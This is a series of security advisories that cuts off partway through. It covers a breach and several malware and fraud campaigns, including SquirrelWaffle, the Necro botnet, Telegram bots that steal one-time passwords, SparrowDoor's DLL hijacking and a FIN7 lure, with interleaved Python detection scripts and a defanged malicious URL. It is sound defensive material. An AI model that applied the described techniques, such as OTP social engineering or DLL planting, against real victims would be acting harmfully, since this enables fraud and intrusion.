(1) Cohen, Golan. “Can You Trust a File’s Digital Signature? New Zloader Campaign Exploits Microsoft’s Signature Verification Putting Users at Risk.” Check Point Research, January 5, 2022. https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/.

(2) Montalbano, Elizabeth. “’Malsmoke’ Exploits Microsoft’s E-Signature Verification.” Threatpost English Global, January 5, 2022. https://threatpost.com/malsmoke-microsoft-e-signature-verification/177363/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

January 10, 2022

200 Million User Records Exposed in Stripchat Breach

I. Targeted Entities

  • Stripchat Users
  • Stripchat Models

II. Introduction

A database containing highly sensitive information on users and models of the adult website Stripchat was discovered online, left completely unprotected. Some say that the leak can put models and users at risk of extortion, violence, and more.

III. Background Information

Volodymyr “Bob” Diachenko, head of security research at Comparitech, reported that he found the database on an Elasticsearch cluster on November 5th. The exposure was reported to Stripchat on November 5th. The database contained 200 million Stripchat records, which included 65 million user records that contained email addresses, IP addresses, the amount in tips they gave to models, a timestamp of when the account was created, and the last payment activity. Another database found contained around 421,000 records for the platform’s models, including their usernames, gender, studio IDs, tip menus and prices, and their live status.[1] It is not clear if anyone with nefarious intent managed to access the data before it was secured on November 7th. Max Bennet, a spokesperson for Stripchat, provided a statement to Threatpost saying that the content of the platform’s chat message was not exposed. He also stated that the leaked payment data contained transaction details and not credit card numbers.[1]

As mentioned previously, the exposure puts models at risk of extortion and violence and poses a privacy risk for both viewers and models, says Diachenko. This harassment could happen online or offline. Stripchat model and user information could also be used in targeted phishing campaigns. Diachenko warns that users should be on the lookout for fraudsters posing as Stripchat or other related companies. He also advises to “never click on links or attachments in unsolicited emails”.[1] The privacy risks for models and users would become more significant if the exposed information were cross-referenced with other data breaches; a full profile of a person could then be assembled. However, Diachenko says that Stripchat data does not reveal a lot of personal information, since users often prefer not to state their real identities, email addresses, or IP addresses (by using a VPN).[1] Even so, much of that information can be matched against other data breaches, and a match can still be made.

IV. MITRE ATT&CK

  • T1560 – Archive Collected Data
    Attackers typically compress or encrypt collected data before exfiltrating it.
  • T1530 – Data from Cloud Storage Object
    The exposed records were held in cloud-based server storage (an Elasticsearch cluster) that was reachable without authentication.
  • T1598 – Phishing for Information
    User and model information obtained from the leak could be used in phishing operations against those individuals.
  • T1114 – Email Collection
    Email addresses exposed in the breach could be used by attackers to target victims’ mailboxes and compromise their message traffic.

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Malware Monitoring
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a

VI. Indicators of Compromise (IOCs)

Please see the general recommendations in the previous section for mitigating data breaches.

VII. References

(1) Bracken, Becky. “200M Adult Cam Model, User Records Exposed in Stripchat Breach.” Threatpost English Global, November 16, 2021. https://threatpost.com/adult-cam-model-user-records-exposed-stripchat-breach/176372/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Dorian Pope, and Tural Hagverdiyev.

December 1, 2021

SquirrelWaffle Loader

I. Targeted Entities

  • Microsoft Office Documents

II. Introduction

A new malware loader, SquirrelWaffle, is being delivered by malicious spam carrying booby-trapped Microsoft Office documents and is in turn used to deliver Qakbot malware.

III. Background Information

Cisco Talos researchers discovered malspam campaigns beginning in mid-September when they noticed booby-trapped Office documents infecting systems with SquirrelWaffle in the initial stage of the infection chain.[1] The campaigns use stolen email threads so that the malicious messages appear as replies within those legitimate threads. The SquirrelWaffle emails typically contain hyperlinks to malicious ZIP archives hosted on attacker-controlled web servers, Cisco Talos researchers say.[1] 76% of the emails are written in English, but the language shifts to the language that was used in the original email thread. The top five languages used are English, French, German, Dutch, and Polish.[1]

Cisco Talos researchers say that SquirrelWaffle isn’t a towering and majestic oak tree, at least not yet. The researchers provided an example of an email in which an attacker replied to an extortion email, which the researchers say is, “ineffective in convincing the recipient to access the content in the body of the email”.[1] The Cisco Talos researchers also say that SquirrelWaffle isn’t as prolific as other campaigns, like Emotet, but is growing.[1]

The Cisco Talos researchers analyzed the SquirrelWaffle campaign and found characteristics indicating that the malicious Office documents were likely crafted with an automated builder. For example, in this campaign, “the Microsoft Excel spreadsheets were crafted to make static analysis with tools like XLMDeobfuscator less effective.”[1] The researchers also report that SquirrelWaffle has run daily spam campaigns since September 10th. Another sign that SquirrelWaffle is distributed with an automated builder is that the URL structure of its distribution servers is tied to the daily campaigns and rotates every few days.[1]

Victims who click the links in the malicious emails download a ZIP archive containing infected Office files, specifically Word documents and Excel spreadsheets. However, researchers have noticed a shift away from Word documents toward almost exclusive use of Excel spreadsheets.[1] When Word documents were used, they were styled to persuade users that the document came from DocuSign, a service used for sharing and signing documents. Whether a Word document or an Excel spreadsheet is used, it is the vehicle that leads to the next stage: the SquirrelWaffle payload.

In all of the SquirrelWaffle campaigns seen, the links used to host the ZIP archives contain Latin words and follow a structure similar to this: abogados-en-medellin[.]com/odit-error/assumenda[.]zip.[1] Inside the ZIP archives, the infected Office files often follow a naming convention like chart-1187900052.xls or diagram-127.doc.[1]
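The two naming conventions above (Latin-word ZIP paths and chart-/diagram-numbered Office files) are concrete enough to turn into a filter. The following is an added example, not code from the advisory or from Cisco Talos: the regular expressions are our own approximation of the described structure, the proxy log layout and the `.invalid` hosts are constructed for the example, and `refang` exists so defanged indicators copied from reports (`hxxp`, `[.]`) can be fed in directly.

```python
import re
from urllib.parse import urlparse

# Patterns modelled on the naming conventions quoted in the advisory (assumed
# regexes written for this example, not Cisco Talos's own detection logic):
#   hosted archive: <host>/<latin-word>[-<latin-word>...]/<latin-word>.zip
#   archive member: chart-<digits>.xls or diagram-<digits>.doc
ARCHIVE_PATH_RE = re.compile(r"^(?:/[a-z]+(?:-[a-z]+)*)+/[a-z]+\.zip$")
MEMBER_NAME_RE = re.compile(r"^(?:chart|diagram)-\d+\.(?:xls|doc)$", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Turn analyst-defanged text (hxxp, [.], [:]) back into a parseable URL."""
    return ioc.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def is_suspicious_archive_url(url: str) -> bool:
    """True when the URL path has the Latin-word ZIP layout described in the advisory."""
    parsed = urlparse(refang(url))
    if parsed.scheme not in ("http", "https"):
        return False
    return ARCHIVE_PATH_RE.match(parsed.path) is not None


def is_suspicious_member_name(name: str) -> bool:
    """True for archive members named like chart-<digits>.xls or diagram-<digits>.doc."""
    return MEMBER_NAME_RE.match(name.strip()) is not None


def scan_proxy_log(lines):
    """Return a list of (timestamp, client, url) for requests matching the archive pattern.

    Line layout (constructed for this example): "<ts> <client> <method> <url> <status>".
    Malformed lines are skipped rather than raising, so a partial log still scans."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _method, url, _status = parts[:5]
        if is_suspicious_archive_url(url):
            hits.append((ts, client, refang(url)))
    return hits


# Constructed sample proxy log; hosts use the reserved .invalid TLD.
SAMPLE_PROXY_LOG = """\
2021-10-26T09:12:01Z 10.0.0.15 GET hxxp://compromised-blog[.]invalid/odit-error/assumenda[.]zip 200
2021-10-26T09:12:05Z 10.0.0.15 GET https://cdn.vendor.invalid/static/app.js 200
2021-10-26T09:13:44Z 10.0.0.22 GET http://files.partner.invalid/files/report-2021.zip 200
2021-10-26T09:15:09Z 10.0.0.31 GET hxxps://another-host[.]invalid/voluptas/quia[.]zip 200
garbage line
""".splitlines()

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("suspicious archive download:", hit)
    for name in ("chart-1187900052.xls", "diagram-127.doc", "budget-2021.xlsx"):
        print(name, "->", is_suspicious_member_name(name))
```

The path regex deliberately rejects digits and mixed case so that ordinary download paths such as `/files/report-2021.zip` do not match; a hit should still be triaged against the archive's contents (the member-name check) rather than blocked on the URL shape alone, since the authors rotate the structure every few days.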

The malware is seemingly being distributed from previously compromised web servers, primarily those running WordPress, with the most prevalent compromised version being WordPress 5.8.1.[1] Cisco Talos researchers were unable to determine whether the same threat actor was responsible for the compromises or whether the servers had been attacked by multiple different actors. Although SquirrelWaffle is relatively new, researchers say its implementation has a lot in common with those seen from other, more established threat actors. Cisco Talos recommends that organizations continue to use comprehensive defensive security controls in order to prevent, detect, or respond to SquirrelWaffle campaigns that they may encounter.[1]

IV. MITRE ATT&CK

  • T1059 – Command and Scripting Interpreter
    SquirrelWaffle uses scripting to initiate its infection chain.
  • T1137 – Office Application Startup
    Office applications such as Word can be configured to run content at startup, providing a platform for malware drops.
  • T1055 – Process Injection
    Malicious processes run on top of the victim OS.
  • T1592 – Gather Victim Host Information
    SquirrelWaffle scans the host system for key information during the infection process.

V. Recommendations

  • Patch Systems and Keep Them Updated
    Make sure your systems are always updated with the latest patch to avoid any malware taking advantage of outdated systems and zero-day vulnerabilities
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
  • Malware Monitoring
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.app.box.com/file/878072989113

VII. References

(1) Vaas, Lisa. “Squirrelwaffle Loader Malspams, Packs Qakbot, Cobalt Strike.” Threatpost English Global, October 26, 2021. https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Dorian Pope.

October 29, 2021

FreakOut Botnet

I. Targeted Entities

  • Visual Tools DVRs

II. Introduction

A new exploit from cybercrime group FreakOut, also known as Necro Python and Python.IRCBot, has been found infecting Visual Tools DVRs with a Monero miner.

III. Background Information

Juniper Threat Labs researchers have written a report detailing the new activities of FreakOut. The team noticed in late September that the botnet had started targeting Visual Tools DVR VX16 4.2.28.0 models with cryptomining attacks.[1] Visual Tools DVRs are generally used as part of a professional-grade surveillance system. A command injection vulnerability was found in the same devices last July.[1] FreakOut has been around since at least January of 2021, exploiting recently identified and unpatched vulnerabilities to launch DDoS and cryptomining attacks.[1] The researchers at Juniper report that the group has developed several iterations of the Necro bot, making steady improvements to its performance and persistence over the months.[1]

Juniper researchers say that the script can run in both Windows and Linux environments and that it has its own polymorphic engine, which morphs the script on every execution so that it can bypass signature-based defenses. This works, the researchers say, by reading every string in its code and encrypting it with a hardcoded key.[2]

The team at Juniper also note several changes from the previous version: the SMB scanner observed in a May 2021 attack has been removed; the bot changed the URL that it injects into script files on the compromised system; and more recent versions of the Necro bot have dropped the earlier reliance on a hardcoded URL in favor of a domain generation algorithm (DGA), for added persistence and harder detection.[2]

The Necro bot works as follows: first, the bot scans for the target ports (22, 80, 443, 8081, 7001). If a target port is detected, it launches XMRig (a high-performance Monero (XMR) miner) linked to a specific wallet. Juniper researchers say that the bot is also actively trying to exploit the following previously identified vulnerabilities:

  • CVE-2020-15568 – TerraMaster TOS before 4.1.29
  • CVE-2021-2900 – Genexis PLATINUM 4410 2.1 P4410-V2-1.28
  • CVE-2020-25494 – Xinuos (formerly SCO) Openserver v5 and v6
  • CVE-2020-28188 – TerraMaster TOS <= 4.2.06
  • CVE-2019-12725 – Zeroshell 3.9.0[2]

Mounir Hahad, head of Juniper Threat Labs, says that security teams need defenses equipped to handle DGA domain attempts. Hahad also said, “The very existence of this kind of botnet highlights the need for a connected security approach where DNS security capabilities on the network identify connection attempts to DGA domains behind public dynamic DNS services, as well as routers, switches, and firewalls that are capable of immediately isolating the compromised host from the rest of the network.”[1]
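The advisory does not describe the Necro DGA itself, so the only generic defence is the one Hahad points at: looking for algorithmically generated names in DNS telemetry. Below is an added example, not code from Juniper or from the advisory, of the kind of heuristic a DNS security layer applies. The thresholds, the entropy/digit/consonant-run features, the naive "label left of the TLD" rule, and the sample query log (with `.invalid` hosts) are all assumptions constructed for this example; production tooling would use the public suffix list and a baseline tuned to the organisation's own traffic.

```python
import math
from collections import Counter

# Thresholds are assumptions chosen for this example; tune them against your own DNS baseline.
ENTROPY_THRESHOLD = 3.5       # bits per character of the registrable label
DIGIT_RATIO_THRESHOLD = 0.2   # fraction of digits in the label
CONSONANT_RUN_THRESHOLD = 5   # longest run of letters with no vowel
VOWELS = set("aeiouy")


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character; higher means closer to random."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registrable_label(qname: str) -> str:
    """Naive registrable label: the label immediately left of the TLD.
    Real deployments should consult the public suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def longest_consonant_run(label: str) -> int:
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def dga_score(qname: str) -> dict:
    """Feature vector plus a flag for one query name."""
    label = registrable_label(qname)
    entropy = shannon_entropy(label)
    digit_ratio = sum(ch.isdigit() for ch in label) / max(len(label), 1)
    run = longest_consonant_run(label)
    flagged = entropy >= ENTROPY_THRESHOLD and (
        digit_ratio >= DIGIT_RATIO_THRESHOLD or run >= CONSONANT_RUN_THRESHOLD
    )
    return {"qname": qname, "label": label, "entropy": round(entropy, 3),
            "digit_ratio": round(digit_ratio, 3), "consonant_run": run, "flagged": flagged}


def scan_dns_log(lines):
    """Return [(client, qname), ...] for queries the heuristic flags.
    Line layout (constructed): "<ts> <client> <qname> <qtype>"; short lines are skipped."""
    flagged = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        _ts, client, qname, _qtype = parts[:4]
        if dga_score(qname)["flagged"]:
            flagged.append((client, qname))
    return flagged


# Constructed sample resolver log: two ordinary names, two algorithmic-looking ones.
SAMPLE_DNS_LOG = """\
2021-10-12T03:14:07Z 10.0.0.15 www.example.invalid A
2021-10-12T03:14:09Z 10.0.0.15 updates.vendor.invalid A
2021-10-12T03:14:11Z 10.0.0.15 xk3v9qzt7wplm.invalid A
2021-10-12T03:14:12Z 10.0.0.15 qwzrtpkvbnmxlsd.invalid A
2021-10-12T03:14:15Z 10.0.0.22 mail.corp.invalid MX
""".splitlines()

if __name__ == "__main__":
    for client, qname in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"possible DGA lookup from {client}: {qname}", dga_score(qname))
```

A single flagged lookup is weak evidence; the signal a SOC actually acts on is one host producing a burst of such names (typically with NXDOMAIN answers) in a short window, which is why the function returns the client alongside the name so results can be grouped per source.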

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    The Necro Python threat actor has been targeting Visual Tools DVR VX16 4.2.28.0.
  • T1064 – Scripting
    A combination of a standalone Python interpreter and a malicious script is used by the malware upon successful infection.
  • T1059.001 – PowerShell
    The malware uses PowerShell functions in order to download and run Python that includes all required modules
  • T1055 – Process Injection
    The bot will also download a JavaScript-based miner that, if clicked, runs within the browser’s process space.
  • T1571 – Non-Standard Port
    Several non-standard ports were observed to be in use. These include but aren’t limited to ports: 5870, 42066, 52566, and 6697
  • T1219 – Remote Access Software
    Necro Python bots are remotely controlled via C2 channels
  • T1056 – Input Capture
    The JavaScript-based bot can be configured from the C2 channel to steal clipboard data and even log keystrokes
  • T1027 – Obfuscated Files or Information
    Setup.py, which is downloaded via PowerShell commands, is an obfuscated bot
  • T1547.001 – Registry Run Keys/Startup Folder
    Upon successful infection, several registry values are updated that point to the pyinstaller or the standalone setup.py.

V. Recommendations

  • Patch Systems and Keep Them Updated
    Make sure your systems are always updated with the latest patch to avoid any malware taking advantage of outdated systems and zero-day vulnerabilities
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
  • Malware Monitoring
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/iaptndxys8jy0g7hiok9ee85ijzwdnue

VII. References

(1) Bracken, Becky. “FreakOut Botnet Turns DVRs Into Monero Cryptominers.” Threatpost English Global, October 13, 2021. https://threatpost.com/freakout-botnet-dvrs-monero-cryptominers/175467/.

(2) Kimayong, Paul. “Necro Python Botnet Goes After Vulnerable VisualTools DVR.” Official Juniper Networks Blogs. Juniper Networks, October 11, 2021. https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev, and Ipsa Bhatt.

October 22, 2021

Weaponized Telegram Bots

I. Targeted Entities

  • Telegram
  • Banks
  • Contactless payment systems

II. Introduction

Cybercriminals are stealing one-time password tokens (OTPs) in order to gain access to PayPal, Apple Pay, Google Pay, and other contactless payment services.

III. Background Information

Researchers from Intel 471 have discovered that cybercriminals are using Telegram bots to steal OTPs and defraud people through banks and online payment systems.[1] Intel 471 researchers reported that the thieves have been operational since June. The threat actors use Telegram bots, along with a range of other tactics, to gain account information, including calling victims and impersonating banks and legitimate services. The cybercriminals also try to bypass two-factor authentication by using social engineering to deceive victims into handing over an OTP or other verification code sent to a mobile device, which the criminals then use to defraud the accounts.[1]

This isn’t the first time that Telegram bots have been used to defraud victims. A similar campaign, called Classiscam, was discovered in January, in which bots were sold as a service by Russian-speaking cybercriminals for the purpose of stealing money and payment data from European victims. Other criminals have been found using Telegram bots as command-and-control for spyware.[1] Intel 471 researchers analyzed this campaign and identified three bots: SMSRanger, BloodOTPbot, and SMS Buster.[1]

Intel 471 researchers described SMSRanger as “easy to use” and similar in nature to a bot in the collaboration tool Slack. By using a “/”, an operator can access scripts that target specific banks or payment services, like PayPal, Apple Pay, or a wireless carrier.[1] SMSRanger sends a potential victim a text message requesting their phone number. Once the phone number has been entered in the chat, the bot takes over, ultimately giving the threat actors access to whatever account has been targeted. Researchers say that approximately 80 percent of the users targeted by SMSRanger provide their full and accurate information to the cybercriminals, allowing the cybercriminals to defraud them.[1]

BloodOTPBot can send users a fraudulent OTP code via SMS. However, this bot requires an attacker to spoof the victim’s phone number and impersonate a bank or company representative.[1] The bot calls victims and uses social engineering techniques to obtain a verification code from the targeted victim. The attacker receives a notification from the bot during the call, and the bot tells the attacker when to request the OTP during the authentication process.[1] Once the victim receives the OTP and enters it on the phone’s keypad, the bot texts the code to the attacker. BloodOTPBot costs $300 a month. Users can also pay $20 to $100 more to access live phishing panels that target social media networks, like Facebook, Instagram, and Snapchat, and financial services like Venmo, PayPal, Robinhood, and even cryptocurrency marketplaces like Coinbase.[1]

The third bot, SMS Buster, requires more effort than the two bots described above, Intel 471 researchers say. The bot provides options that let an attacker disguise a call made from any phone number so that it appears to come from a legitimate contact at a specific bank. Once a potential victim has been reached, attackers follow a script to try to fool the victim into providing sensitive information like an ATM card PIN, a credit card verification value, or an OTP.[1] Researchers also observed criminals using SMS Buster against Canadian victims, targeting them in both English and French. Intel 471 researchers have seen eight different Canadian-based banks illegally accessed via SMS Buster.

IV. MITRE ATT&CK

  • T1528 – Steal Application Access Token
    Account access is dependent on threat actors stealing a user’s one-time password or OTP.
  • T1566 – Phishing
    Telegram bots are being used to call users and impersonate banks and other services.
  • T1078 – Valid Accounts
    Once an OTP has been compromised, attackers can use the client’s account to steal information, money, and potentially compromise other users.
  • T1199 – Trusted Relationship
    Account access allows attackers to breach the organization and access their intended victims.
  • T1036 – Masquerading
    Threat actors pretend to be the client’s bank to manipulate OTP controls and access the user.

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

At the time of writing, no IOCs, or CVEs, have been issued.

VII. References

(1) Montalbano, Elizabeth. “Threat Actors Weaponize Telegram Bots to Compromise PayPal Accounts.” Threatpost English Global, September 29, 2021. https://threatpost.com/telegram-bots-compromise-paypal/175099/.

Threat Advisory created by the Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Jessica Senatus, Sreten Dedic, EJ Bulut, Uday Bilakhiya, and Tural Hagverdiyev.

October 1, 2021

FamousSparrow APT: SparrowDoor Backdoor

I. Targeted Entities

  • Hotels
  • Governments
  • Private organizations
  • Engineering companies
  • Law firms

II. Introduction

A cyberespionage group known as FamousSparrow has emerged, targeting governments, private organizations, and hotels around the globe with a custom backdoor called SparrowDoor.

III. Background Information

According to ESET, SparrowDoor is a backdoor used by an advanced persistent threat (APT) group, with the ability to rename or delete files; create directories; shut down processes; send information such as file attributes, file size, and file write time; exfiltrate the content of a specified file; write data to a specified file; or establish an interactive reverse shell. SparrowDoor also has a kill switch to remove persistence settings and all SparrowDoor files from a victim’s machine.

FamousSparrow used a remote code execution (RCE) vulnerability known as ProxyLogon to deploy SparrowDoor by exploiting vulnerable internet-facing web applications. ESET researchers believe that FamousSparrow exploited well-known RCE vulnerabilities in Microsoft Exchange, Microsoft SharePoint, and Oracle Opera (which is used for hotel management) to drop various malicious samples.

Once a machine is compromised, FamousSparrow infects it with a range of custom tools. According to ESET’s analysis, the custom tools include: a Mimikatz variant for lateral movement; a small utility that drops ProcDump on disk and uses it to dump the lsass process, probably to gather in-memory secrets such as credentials; Nbtscan, a NetBIOS scanner for identifying files and printers across a LAN; and a loader for the SparrowDoor backdoor. Researchers also noted that the loader installs SparrowDoor via DLL search-order hijacking.

The loader abuses DLL search-order hijacking. Specifically, the legitimate executable Indexer.exe requires the library K7UL.dll to operate. The victim operating system looks for the DLL in the directories of the prescribed load order, and because the directory containing Indexer.exe has the top priority in that order, a malicious K7UL.dll placed there is loaded in place of the legitimate one.
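The defender's counterpart to the hijack described above is an audit of application directories: for each DLL an executable loads by name, is there a copy sitting beside the executable, and is it the copy the vendor shipped? The following is an added example, not code from ESET or from the advisory. It reuses the Indexer.exe and K7UL.dll names from the page, but the file contents, the hypothetical second import `Helper.dll`, and the temporary directory layout are constructed for the example, and the list of imported DLL names is passed in by the caller rather than parsed from the PE import table.

```python
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_application_dir(exe_path: str, imported_dlls, known_good: dict) -> list:
    """Flag DLLs beside exe_path that would win the search order over a system copy.

    imported_dlls: DLL names the executable loads by name (from its import table; supplied
                   by the caller here because PE parsing is outside this example).
    known_good:    {lowercase dll name: sha256} for copies the vendor legitimately ships
                   beside the executable.
    A DLL found beside the exe that the vendor does not ship there, or whose hash differs
    from the vendor copy, is exactly the planting the SparrowDoor loader relies on."""
    app_dir = os.path.dirname(os.path.abspath(exe_path))
    findings = []
    for dll in imported_dlls:
        candidate = os.path.join(app_dir, dll)
        if not os.path.isfile(candidate):
            continue  # nothing beside the exe, so the system copy (if any) is loaded
        digest = sha256_file(candidate)
        expected = known_good.get(dll.lower())
        if expected is None:
            findings.append({"dll": dll, "path": candidate, "sha256": digest,
                             "reason": "not shipped by vendor beside executable"})
        elif digest != expected:
            findings.append({"dll": dll, "path": candidate, "sha256": digest,
                             "reason": "hash differs from vendor copy"})
    return findings


def run_demo() -> dict:
    """Constructed scenario: Indexer.exe imports K7UL.dll and a hypothetical Helper.dll.
    All file contents are dummy bytes; only the names come from the advisory."""
    imports = ["K7UL.dll", "Helper.dll"]
    results = {}
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "Indexer")
        os.makedirs(app)
        exe = os.path.join(app, "Indexer.exe")
        dll = os.path.join(app, "K7UL.dll")
        with open(exe, "wb") as f:
            f.write(b"MZ dummy executable")
        with open(dll, "wb") as f:
            f.write(b"vendor-shipped K7UL contents")
        known_good = {"k7ul.dll": sha256_file(dll)}  # baseline taken from a clean install

        results["clean"] = audit_application_dir(exe, imports, known_good)

        with open(dll, "wb") as f:          # the shipped DLL is replaced in place
            f.write(b"replacement loader contents")
        results["tampered"] = audit_application_dir(exe, imports, known_good)

        with open(os.path.join(app, "Helper.dll"), "wb") as f:  # a DLL the vendor never shipped
            f.write(b"planted contents")
        results["planted"] = audit_application_dir(exe, imports, known_good)
    return results


if __name__ == "__main__":
    for scenario, findings in run_demo().items():
        print(scenario, "->", [(f["dll"], f["reason"]) for f in findings])
```

The baseline hashes should come from a known-clean install or the vendor's signed package, and on a real Windows host the same audit is worth running against every directory listed in `PATH` as well, since those precede nothing but still sit ahead of the current working directory in the default search order. Note that Windows file names are case-insensitive, while the temporary tree used here is not; a production version should compare names case-insensitively when walking the directory.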

The malware is able to establish persistence and open encrypted TLS connections to a command-and-control server on port 433. Furthermore, the malware achieves privilege escalation by adjusting the access token of the SparrowDoor process to enable SeDebugPrivilege, a legitimate Windows privilege used to debug processes other than one’s own. After that, SparrowDoor collects and sends the victim’s local IP address, the Remote Desktop Services session ID associated with the backdoor process, the username, and the computer name to the command-and-control server, then waits for commands in return. This is the start of the spying campaign.

FamousSparrow primarily targets hotels, but ESET has found FamousSparrow in other sectors as well, notably governments, international organizations, engineering companies, and law firms. Attacks have been seen globally, in Brazil, Canada, Israel, France, Guatemala, Lithuania, Saudi Arabia, South Africa, Taiwan, Thailand, and the United Kingdom.

IV. MITRE ATT&CK

  • T1588.005 – Obtain Capabilities: Exploits
    FamousSparrow utilizes RCE vulnerabilities in Microsoft Exchange, SharePoint, and Oracle Opera.
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell
    FamousSparrow uses Windows cmd.exe to download and install SparrowDoor.
  • T1027 – Obfuscated Files or Information
    SparrowDoor encrypts MpSvc.dll and the config files it uses with an XOR function.
  • T1543.003 – Create or Modify System Process: Windows Service
    SparrowDoor is hidden within a fake Windows service called WSearchIndex.
  • T1134.002 – Access Token Manipulation: Create Process with Token
    Using the CreateProcessAsUserA API, SparrowDoor is able to use tokens to create new processes.
  • T1082 – System Information Discovery
    SparrowDoor collects user and computer names in addition to RDP session and machine-specific drive information.
  • T1083 – File and Directory Discovery
    SparrowDoor can examine files on infected machines.
  • T1573.001 – Encrypted Channel: Symmetric Cryptography
    C2 communication is carried out using XOR keys.

V. Recommendations

  • Ensure Antivirus Software is Updated
    Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
  • Enable Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the products that are being used.

VI. IOCs

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/tuz87dop8aiua88m62hw9yl1il5dmio6

VII. References

(1) Seals, Tara. “FamousSparrow APT Wings in to Spy on Hotels, Governments.” Threatpost English Global, September 23, 2021. https://threatpost.com/famoussparrow-spy-hotels-governments/174948/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, and Tural Hagverdiyev.

September 24, 2021

FIN7 Windows 11 Alpha Campaign

I. Targeted Entities

  • Technology Industry
  • Windows Users
  • General Public

II. Introduction

Using infected Microsoft Word documents, cybercrime group FIN7 has begun targeting the newly released Windows 11.[1] As reported by the researchers at Anomali, six new documents were seen circulating recently involving the use of JavaScript-based macros intended for the Windows 11 Alpha.[1] Researchers noted that the campaign appeared to primarily target a California-based company called Clearmind.[1] FIN7 is an Eastern European threat group that primarily targets U.S.-based companies.[3]

III. Background Information

Infection appears to use a standard attack vector in which users are shown a document containing a decoy image. The image states that it was made with Windows 11 Alpha[1] and asks the user to “Enable Editing and Content” to begin the next phase of the attack.[3] The VBScript is obfuscated with junk comments.[3] Researchers found that a hidden table contained encoded values that, when deciphered with an XOR cipher, revealed a key and a table of languages.[3] The code checks for several Eastern-European languages in the included table and, if any is detected, deletes the table and stops operating.[3]

